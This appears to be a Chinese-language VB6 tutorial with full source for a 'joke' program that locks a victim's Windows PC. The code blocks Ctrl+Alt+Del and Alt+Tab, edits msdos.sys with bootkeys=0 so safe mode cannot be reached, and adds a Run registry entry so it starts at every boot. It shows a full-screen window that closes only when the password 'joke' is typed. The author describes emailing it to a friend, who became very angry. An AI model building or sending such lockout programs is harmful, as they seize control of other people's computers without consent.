此程序演示怎样在vb中调用api修改注册表,让程序每次启动都会执行,运用shell函数,操做文本文件,屏蔽系统功能,做出一个能够修改系统的程序(当然能和你的朋友开个玩笑),并且用事件key_press接收密码来关闭程序。
模块中声明:
’创建子键
public declare function regcreatekey lib "advapi32.dll" alias "regcreatekeya" _
(byval hkey as long, byval lpsubkey as string, _
phkresult as long) as long
’创建键值
public declare function regsetvalueex lib "advapi32.dll" alias "regsetvalueexa" _
(byval hkey as long, byval lpvaluename as string, _
byval reserved as long, byval dwtype as long, _
lpdata as any, byval cbdata as long) as long
’调用api阻挡功能键
public declare function systemparametersinfo lib "user32" alias _
"systemparametersinfoa" (byval uaction as long, _
byval uparam as long, byref lpvparam as any, _
byval fuwinini as long) as long
’调用api控制shell进程
public declare function getexitcodeprocess lib "kernel32" _
(byval hprocess as long, lpexitcode as long) as long
public declare function openprocess lib "kernel32" (byval dwdesiredaccess as long, _
byval binherithandle as long, byval dwprocessid as long) as long
窗体代码如下:
通用 声明
dim a(3) as integer
const spl_screensaverrunning = 97
const process_query_information = &h400
const still_active = &h103
dim hprocess as long
dim pad as long
dim code as long
const hkey_local_machine = &h80000002
const regkey = "software\microsoft\windows\currentversion\run"
const keyvalue = "run.exe"
dim retvalue as long
dim keyid as long
private sub form_load()
’api调用阻挡"ctrl+alt+del","ctrl+esc","alt+tab"热键
systemparametersinfo spl_screensaverrunning, true, byval 1&, 0’因为shell的异步执行,外部程序还未完成任务,vb便往下执行,
’会造成文件访问错误,调用api函 数openprocess和getexitcodeprocess
’解决问题,去掉msdos.sys的只读,隐蔽属性pad = shell("attrib -h -s -r c:\msdos.sys /s", vbhide)
hprocess = openprocess(process_query_information, false, pad)
dogetexitcodeprocess hprocess, code
doeventsloop while code = still_active
’修改msdos.sys,给其中添加bootkeys=0,让启动时功能键f5,f8,ctrl,shift失效,
’用户不能进入safemode修改
open "c:\msdos.sys " for append as #1
print #1, "bootkeys=0"
close #1
shell "attrib +h +s +r c:\msdos.sys /s", vbhide
end sub
’修改注册表,在"software\microsoft\windows\currentversion\run" 下创建字符串值"run",
’值为"run.exe",让每次启动都会执行
’retvalue = regcreatekey(hkey_local_machine, regkey, keyid)
’retvalue = regsetvalueex(keyid, "run", 0&, 1, byval keyvalue, len(keyvalue) + 1)
’接收密码的asc码值,密码为joke
private sub form_keypress(keyascii as integer)
a(3) = a(2)
a(2) = a(1)
a(1) = a(0)
a(0) = keyascii
if a(0) = 101 and a(1) = 107 and a(2) = 111 and a(3) = 106 thenend
end if
end sub
’在窗体退出时使三组热键生效
private sub form_queryunload(cancel as integer, unloadmode as integer)
systemparametersinfo spl_screensaverrunning, false, byval 1&, 0
end sub
以上程序编译为run.exe,在vb6中调试通过,你可以自行在窗体中加入文本框,并且把窗体属 性borderstyle改为0-none,windowstate改为2-maximized,就做出了一个关不掉的程序,并且每次 启动都会执行,我就是通过e-mail给朋友发送了这个程序,把朋友惹得非常生气,我在这里郑重的表示道歉,i’m so sorry,please forgive me,madam you!
